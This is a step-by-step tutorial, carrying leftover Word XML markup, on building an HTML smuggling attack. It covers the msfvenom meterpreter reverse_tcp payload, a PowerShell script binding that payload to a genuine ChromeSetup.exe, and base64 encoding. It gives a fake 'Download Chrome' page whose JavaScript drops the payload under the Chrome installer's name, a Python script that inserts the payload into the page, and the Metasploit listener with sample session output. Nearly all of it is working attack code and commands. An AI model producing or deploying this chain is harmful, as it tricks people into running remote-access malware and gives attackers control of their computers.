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cn3d0hgbkpo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HTML Smuggling Attack Construction: Metasploit reverse_tcp payload bound with Legitimate ChromeSetup.exe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7k0neqlyxqii" w:id="1"/>
      <w:bookmarkEnd w:id="1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deliver a Metasploit reverse_tcp payload bound with the legitimate ChromeSetup.exe file through an HTML smuggling technique.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wl0oz0y54w6" w:id="2"/>
      <w:bookmarkEnd w:id="2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Kali Linux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Apache web server installed and running.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msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Metasploit Framework installed.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Base64 encoding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command).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Python was installed for running scripts.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Windows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PowerShell for script execution.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ChromeSetup.exe and payload.exe are ready for binding.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SCP client for file transfers (e.g., PuTTY's PSCP or WinSCP).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Network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Both machines should be on the same network or have proper network configurations for SSH and web access.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6cyoefjp42ew" w:id="3"/>
      <w:bookmarkEnd w:id="3"/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cz6jrxhk7n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the Malicious Payload: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Generate Metasploit Payload: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msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=*your_ip* lport=4444 -f exe -o payload.exe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creates a Metasploit payload that will establish a reverse TCP connection back to the attacker's machine when executed.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b9iglv8rrk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Bind Payload with ChromeSetup.exe Using PowerShell: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Using Binding Tool (recommended):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UnamBinder 1.3.0 - A free silent native file binder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https://github.com/UnamSanctam/UnamBinder.git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PowerShell Script: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Read both executables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$exe1 = [System.IO.File]::ReadAllBytes("C:\\Users\\allen\\Downloads\\ChromeSetup.exe")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$exe2 = [System.IO.File]::ReadAllBytes("C:\\Users\\allen\\Downloads\\payload.exe")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Combine them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$combined = New-Object byte[] ($exe1.Length + $exe2.Length)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[Array]::Copy($exe1, 0, $combined, 0, $exe1.Length)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[Array]::Copy($exe2, 0, $combined, $exe1.Length, $exe2.Length)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 the combined executable to a new file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[System.IO.File]::WriteAllBytes("C:\\Users\\allen\\Downloads\\combined.exe", $combined)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script reads the legitimate ChromeSetup.exe and the payload.exe, combines them into a one-byte array, and writes the combined data into a new executable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combined.exe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If the script is saved in a file, execute it by typing the following command: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.\your_script_name.ps1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l65sskbdff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Encode the Payload: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Convert to Base64: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base64 -w0 combined.exe &gt; payload.b64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encodes the combined executable into a base64 string, which can be embedded in an HTML file.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07oahjxoa0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the HTML Smuggling Page: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test.html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&lt;title&gt;Download Chrome&lt;/title&gt;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&lt;style&gt;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body { font-family: Arial, sans-serif; text-align: center; padding: 50px; background-color: #f1f1f1;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.container { max-width: 600px; margin: auto; background: white; padding: 20px; box-shadow: 0 0 10px rgba(0,0,0,0.1); border-radius: 10px;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.btn { background-color: #4285f4; color: white; padding: 15px 25px; font-size: 18px; border: none; cursor: pointer; border-radius: 5px; transition: background-color 0.3s;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.btn:hover { background-color: #357ae8;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.btn:active { background-color: #2b5cb7;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.loader { border: 8px solid #f3f3f3; border-top: 8px solid #4285f4; border-radius: 50%; width: 50px; height: 50px; animation: spin 1s linear infinite; display: none; margin: 20px auto;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@keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); }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&lt;/style&gt;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&lt;h1&gt;Get Chrome&lt;/h1&gt;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&lt;p&gt;Download the fast, secure browser recommended by Google.&lt;/p&gt;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&lt;button class="btn" onclick="startDownload()"&gt;Download Chrome&lt;/button&gt;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&lt;div class="loader" id="loader"&gt;&lt;/div&gt;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fileData = 'BASE64_ENCODED_STRING'; // Replace with your base64 encoded payload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fileName = 'ChromeSetup.exe';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function startDownload()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document.getElementById('loader').style.display = 'block';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setTimeout(downloadPayload, 3000); // Add a 3-second delay for the gimmick effect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function downloadPayload()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binary = atob(fileData);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len = binary.length;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buffer = new Uint8Array(len);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(var i = 0; i &lt; len; i++)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buffer[i] = binary.charCodeAt(i);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blob = new Blob([buffer], { type: 'application/octet-stream' });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url = window.URL.createObjectURL(blob);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a = document.createElement('a');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a.href = url;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a.download = fileName;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document.body.appendChild(a);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a.click();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window.URL.revokeObjectURL(url);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document.getElementById('loader').style.display = 'none';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&lt;/script&gt;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HTML page contains JavaScript to decode the base64-encoded payload and create a downloadable file when the "Download Chrome" button is clicked. It also includes a loading spinner for visual effects.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Insert Base64 String into HTML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Run the Python script to insert the base64 string into the HTML file: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Define the paths to the input and output files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b64_file_path = 'payload.b64'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html_file_path = 'test.html'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output_file_path = 'output_test.html'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Read the base64 string from the payload.b64 file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open(b64_file_path, 'r') as b64_file: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base64_string = b64_file.read().strip()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Read the contents of the test.html file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open(html_file_path, 'r') as html_file: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html_content = html_file.read()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Replace the placeholder with the actual base64 string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new_html_content = re.sub(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r"var fileData = '.*?';",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f"var fileData = '{base64_string}';",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html_content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 the updated content to a new HTML file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open(output_file_path, 'w') as output_file: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output_file.write(new_html_content)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print(f"Base64 string inserted and saved to {output_file_path}")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Run this script to create the new HTML file with the base64 payload inserted.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mt6ll698ri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Host the HTML File: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Move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test.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the web server directory: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mv test.html /var/www/html/test.html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moves the HTML file to the web server's root directory.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bzytrwnt6h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Start the Web Server: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Ensure the web server is running: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service apache2 start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command starts the Apache web server.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b01l0rkkl6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Access the HTML Page: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Open the web page on the target machine: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http://your_server_ip/test.html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target user navigates to the hosted HTML page.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lvbbgn2b4v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Download and Execute the Payload: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Click the "Download Chrome" button to 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ChromeSetup.exe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Before executing the downloaded file, go through step 9 and then run the downloaded file to establish a reverse connection to the attacker's machine.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arxsfaxi1b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Metasploit Setup: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Start the Metasploit listener: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msfconsole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exploit/multi/handler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payload windows/x64/meterpreter/reverse_tcp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lhost *your_ip*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lport 4444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exploit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sets up the Metasploit framework to listen for incoming connections from the payload.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mrg5pvijkp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Monitor Meterpreter Session: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Once the payload is executed, a Meterpreter session should open in Metasploit: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[*] Sending stage (201283 bytes) to *your_ip*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[*] Meterpreter session 1 opened (*your_ip*:4444 -&gt; *your_ip*:xxxxx) at 2024-07-14 12:34:56 +0000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This indicates that the reverse TCP connection has been successfully established, and the attacker now has a Meterpreter session on the target machine.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before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fi87o1vtda2" w:id="14"/>
      <w:bookmarkEnd w:id="14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By following these steps, you can construct and execute an HTML smuggling attack to deliver a combined payload using a web server and Metasploit. This technique highlights the importance of proper security measures to defend against such attacks.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amSanctam/UnamBinder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